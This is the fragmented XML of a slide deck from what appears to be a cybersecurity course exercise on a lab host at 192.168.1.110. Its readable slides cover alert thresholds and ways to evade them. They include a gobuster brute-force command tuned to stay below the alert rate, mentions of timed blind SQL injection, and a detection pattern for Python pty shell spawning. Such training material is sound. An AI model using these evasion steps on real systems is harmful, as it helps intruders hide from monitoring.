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9" r:id="rId1"/>
    <p:sldMasterId id="2147483780" r:id="rId2"/>
    <p:sldMasterId id="2147483781" r:id="rId3"/>
    <p:sldMasterId id="2147483782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24377650" cy="13716000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Amatic SC" panose="00000500000000000000" pitchFamily="2" charset="-79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elvetica Neue" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId25"/>
      <p:bold r:id="rId26"/>
      <p:italic r:id="rId27"/>
      <p:boldItalic r:id="rId28"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Inconsolata" pitchFamily="1" charset="0"/>
      <p:regular r:id="rId29"/>
      <p:bold r:id="rId30"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Lato Light" panose="020F0502020204030203" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId31"/>
      <p:bold r:id="rId32"/>
      <p:italic r:id="rId33"/>
      <p:boldItalic r:id="rId34"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Poppins" panose="00000500000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId35"/>
      <p:bold r:id="rId36"/>
      <p:italic r:id="rId37"/>
      <p:boldItalic r:id="rId38"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Poppins Medium" panose="00000600000000000000" pitchFamily="2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Roboto Black" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:bold r:id="rId47"/>
      <p:boldItalic r:id="rId48"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId49"/>
      <p:bold r:id="rId50"/>
      <p:italic r:id="rId51"/>
      <p:boldItalic r:id="rId52"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId53"/>
      <p:bold r:id="rId54"/>
      <p:italic r:id="rId55"/>
      <p:boldItalic r:id="rId56"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Thin" panose="020000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9AA875-E046-443D-A687-EE75BC4A23F7}">
  <a:tblStyle styleId="{ED9AA875-E046-443D-A687-EE75BC4A23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6" d="100"/>
          <a:sy n="26" d="100"/>
        </p:scale>
        <p:origin x="869" y="29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50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font32.fntdata"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font37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11.fntdata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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font35.fntdata"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font40.fntdata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font" Target="fonts/font1.fntdata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font" Target="fonts/font30.fntdata"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font38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3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59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font41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54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font3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font" Target="fonts/font31.fntdata"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font39.fntdata"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml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52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font34.fntdata"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font4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8bd883d690_5_5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8bd883d690_5_5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8bd883d69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8bd883d69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8bd883d69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8bd883d69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8bd883d69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8bd883d69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e09e24a58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e09e24a58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ge09e24a58b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8bd883d690_5_4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8bd883d690_5_4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883d690_5_3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883d690_5_3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8bd883d6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8bd883d6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8bd883d690_5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8bd883d690_5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8bd883d69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8bd883d69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8bd883d69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8bd883d69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0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6" name="Google Shape;1596;p10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8" name="Google Shape;1598;p10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10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10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104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10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104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104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9" name="Google Shape;1629;p10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10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7" name="Google Shape;1637;p10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9" name="Google Shape;1639;p10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1" name="Google Shape;1641;p10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6" name="Google Shape;1646;p105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105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105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1" name="Google Shape;1661;p105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105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105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105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105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4" name="Google Shape;1684;p10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10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688;p10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3" name="Google Shape;1693;p106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106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106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106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3" name="Google Shape;1713;p106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106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3" name="Google Shape;1723;p106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10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31" name="Google Shape;1731;p10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3" name="Google Shape;1733;p10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5" name="Google Shape;1735;p10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107"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3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7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4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10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10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7" name="Google Shape;1757;p10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8" name="Google Shape;1758;p108"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2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108"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3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6" name="Google Shape;1766;p10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8" name="Google Shape;1768;p10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10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09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7" name="Google Shape;1787;p109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8" name="Google Shape;1788;p109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9" name="Google Shape;1789;p109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0" name="Google Shape;1790;p109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4" name="Google Shape;1794;p11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6" name="Google Shape;1796;p1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11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9" name="Google Shape;1799;p110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10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4" name="Google Shape;1804;p110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5" name="Google Shape;1805;p110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1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3" name="Google Shape;1813;p11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5" name="Google Shape;1815;p1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11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8" name="Google Shape;1818;p111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11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3" name="Google Shape;1823;p111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4" name="Google Shape;1824;p111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2" name="Google Shape;1832;p11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4" name="Google Shape;1834;p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6" name="Google Shape;1836;p11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7" name="Google Shape;1837;p11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1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2" name="Google Shape;1842;p11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3" name="Google Shape;1843;p11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1" name="Google Shape;1851;p1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3" name="Google Shape;1853;p1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5" name="Google Shape;1855;p1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6" name="Google Shape;1856;p11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1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1" name="Google Shape;1861;p11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2" name="Google Shape;1862;p11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0" name="Google Shape;1870;p1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2" name="Google Shape;1872;p1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4" name="Google Shape;1874;p1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5" name="Google Shape;1875;p114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11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0" name="Google Shape;1880;p114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1" name="Google Shape;1881;p114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1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1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2" name="Google Shape;1892;p11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4" name="Google Shape;1894;p1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6" name="Google Shape;1896;p11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7" name="Google Shape;1897;p115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15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2" name="Google Shape;1902;p115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3" name="Google Shape;1903;p115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15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4" name="Google Shape;1914;p11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1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11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9" name="Google Shape;1919;p116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16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4" name="Google Shape;1924;p116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5" name="Google Shape;1925;p116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16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36" name="Google Shape;1936;p11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8" name="Google Shape;1938;p1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1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1" name="Google Shape;1941;p11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6" name="Google Shape;1946;p11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7" name="Google Shape;1947;p11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1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8" name="Google Shape;1958;p1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0" name="Google Shape;1960;p1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2" name="Google Shape;1962;p11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3" name="Google Shape;1963;p118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18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0" name="Google Shape;1970;p118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1" name="Google Shape;1971;p118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2" name="Google Shape;1972;p118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3" name="Google Shape;1973;p118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1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3" name="Google Shape;1983;p11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5" name="Google Shape;1985;p1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7" name="Google Shape;1987;p11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8" name="Google Shape;1988;p119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19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5" name="Google Shape;1995;p119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6" name="Google Shape;1996;p119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7" name="Google Shape;1997;p119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8" name="Google Shape;1998;p119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8" name="Google Shape;2008;p12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0" name="Google Shape;2010;p1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2" name="Google Shape;2012;p12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3" name="Google Shape;2013;p120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120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0" name="Google Shape;2020;p120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1" name="Google Shape;2021;p120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2" name="Google Shape;2022;p120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3" name="Google Shape;2023;p120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2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3" name="Google Shape;2033;p12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5" name="Google Shape;2035;p1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7" name="Google Shape;2037;p12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8" name="Google Shape;2038;p12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2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5" name="Google Shape;2045;p12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6" name="Google Shape;2046;p12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7" name="Google Shape;2047;p12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8" name="Google Shape;2048;p12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1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58" name="Google Shape;2058;p12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0" name="Google Shape;2060;p1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2" name="Google Shape;2062;p12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3" name="Google Shape;2063;p122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122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22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122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122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122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22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6" name="Google Shape;2086;p1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8" name="Google Shape;2088;p1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0" name="Google Shape;2090;p1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1" name="Google Shape;2091;p123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23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23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123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23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23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23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4" name="Google Shape;2114;p1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1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8" name="Google Shape;2118;p1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9" name="Google Shape;2119;p12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24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2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24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24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2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1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2" name="Google Shape;2142;p1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4" name="Google Shape;2144;p1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6" name="Google Shape;2146;p1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7" name="Google Shape;2147;p12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2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2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2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2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2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2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69" name="Google Shape;2169;p1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1" name="Google Shape;2171;p1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3" name="Google Shape;2173;p1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6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6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6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126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126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6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26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2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0" name="Google Shape;2200;p1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7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27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127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27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27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7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7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127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1" name="Google Shape;2231;p1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28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28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28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28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28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128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28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128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2" name="Google Shape;2262;p1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4" name="Google Shape;2264;p1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6" name="Google Shape;2266;p1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12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2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2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2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2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2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2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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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94" name="Google Shape;2294;p1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1" name="Google Shape;1321;p84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2" name="Google Shape;1322;p84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0" name="Google Shape;1330;p8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1" name="Google Shape;1331;p8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0" name="Google Shape;1340;p8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1" name="Google Shape;1341;p8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1" name="Google Shape;1351;p8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2" name="Google Shape;1352;p8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7" name="Google Shape;1357;p88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3" name="Google Shape;1363;p8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7" name="Google Shape;1367;p9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9" name="Google Shape;1369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1" name="Google Shape;1371;p9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2" name="Google Shape;1372;p90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6" name="Google Shape;1376;p91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7" name="Google Shape;1377;p91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8" name="Google Shape;1378;p91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9" name="Google Shape;1379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2" name="Google Shape;1382;p91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8" name="Google Shape;1408;p94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3" name="Google Shape;1413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4" name="Google Shape;1414;p9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5" name="Google Shape;1415;p95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7" name="Google Shape;1417;p95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8" name="Google Shape;1418;p95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5" name="Google Shape;1425;p96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1" name="Google Shape;1431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3" name="Google Shape;1433;p97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4" name="Google Shape;1434;p97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5" name="Google Shape;1435;p97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9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9" name="Google Shape;1449;p98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2" name="Google Shape;1452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6" name="Google Shape;1456;p99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99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9" name="Google Shape;1459;p9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0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63" name="Google Shape;1463;p10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5" name="Google Shape;1465;p10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10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100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00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5" name="Google Shape;1485;p100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6" name="Google Shape;1486;p100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0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0" name="Google Shape;1490;p10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2" name="Google Shape;1492;p10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4" name="Google Shape;1494;p10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101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01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2" name="Google Shape;1512;p101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3" name="Google Shape;1513;p101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01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0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22" name="Google Shape;1522;p10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4" name="Google Shape;1524;p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10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10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1" name="Google Shape;1551;p102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5" name="Google Shape;1555;p102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0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9" name="Google Shape;1559;p10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10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567;p103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103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9" name="Google Shape;1589;p103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0" name="Google Shape;1590;p103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1" name="Google Shape;1591;p10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2" name="Google Shape;1592;p103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21.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout126.xml"/><Relationship Id="rId50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45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout124.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme4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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout123.xml"/><Relationship Id="rId52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22.xml"/><Relationship Id="rId48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87.xml"/><Relationship Id="rId51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Relationship Id="rId4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99.xml"/><Relationship Id="rId41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4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.11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.110/wordpres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.110/wordpres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hyperlink" Target="mailto:Michael@192.168.1.110" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:ichael@192.168.1.11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ichael@192.168.1.11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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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327" name="Google Shape;2327;p13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5" name="Google Shape;2405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6" name="Google Shape;2406;p14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10</a:t>
            </a:fld>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2407" name="Google Shape;2407;p146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8" name="Google Shape;2408;p146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1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Stealth Exploitation of Weak Password &amp; Authentication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4" name="Google Shape;2414;p1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415" name="Google Shape;2415;p147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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Http Request Size Monitor</a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1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r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http requests</a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; 3500</a:t>
            </a:r>
            <a:endParaRPr sz="4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Mitigating Detection</a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gobuster &amp; change thread count to &gt;3500. (-t = set # of threads / -c = wait time. Saying run this amount of threads during X amount if time).</a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dirtbuster / Aircarack -ng</a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="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If possible, include a screenshot of your stealth technique.</a:t>
            </a:r>
            <a:endParaRPr sz="44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gobuster -u http://192.168.1.110 / -w/usr/share/wordlists/rockyou.txt -t 3400 -c 60</a:t>
            </a:r>
            <a:endParaRPr sz="4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1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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2421" name="Google Shape;2421;p1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22" name="Google Shape;2422;p14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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Excessive HTTP Errors</a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1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r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP Response Errors</a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP Response errors &gt; 400 for 5 Minutes</a:t>
            </a:r>
            <a:endParaRPr sz="4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Mitigating Detection</a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>time based blind SQL injection - forcing a delay in the execution queries. So, &gt; 5 queries per 5 minutes</a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BSQL hacker / SQL map</a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1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If possible, include a screenshot of your stealth technique.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Privelage Ecalation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2428" name="Google Shape;2428;p1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29" name="Google Shape;2429;p149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Monitoring Overview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Which alerts detect this exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Auditbeat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-* with logs-endpoint.events.* to look at Python processes (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>process.name:python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>process.args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: (“import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pty.spawn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(\”/bin/\”)” or “import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pty.spawn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(|”/bin/dash\”)” or import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pty.spawn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (\”/bin/bash|”)”</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1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Which metrics do they measure? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>process.name:python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>process.args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: (“import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pty.spawn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(|”/bin/bash\”)” or “import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pty.spawn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(|”/bin/bash\”)” or “import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pty.spawn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(\”/bin/bash\”)”</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1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Which thresholds do they fire at? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If above process.name &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>process.args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is triggered </a:t>
            </a:r>
            <a:endParaRPr sz="32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Mitigating Detection</a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1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How can you execute the same exploit without triggering the alert? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gobuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &amp; set thread count to &lt;3500. _t + set number of threads. –c = wait time, Saying run this amount of threads during X amount of time.</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1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Are there alternative exploits that may perform better? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alternative list: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dirbuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gobuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aircrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-ng, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ncrack</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1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If possible, include a screenshot of your stealth technique. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gobuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://192.168.1.110/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -w /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
